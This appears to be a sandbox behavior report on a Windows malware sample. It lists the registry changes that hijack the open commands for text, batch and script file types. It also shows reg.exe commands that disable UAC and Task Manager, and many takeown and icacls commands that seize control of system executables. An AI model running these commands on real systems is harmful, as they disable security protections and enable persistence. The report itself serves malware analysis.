Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe RTFDF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe CMDSF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5108 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 5108 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 5108 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 5108 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 5108 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe

"C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\bfsvc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\HelpPane.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\hh.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\splwow64.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\winhlp32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\write.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\raserver.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\msra.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\logagent.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\runas.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\System32\mode.com"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\mode.com" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

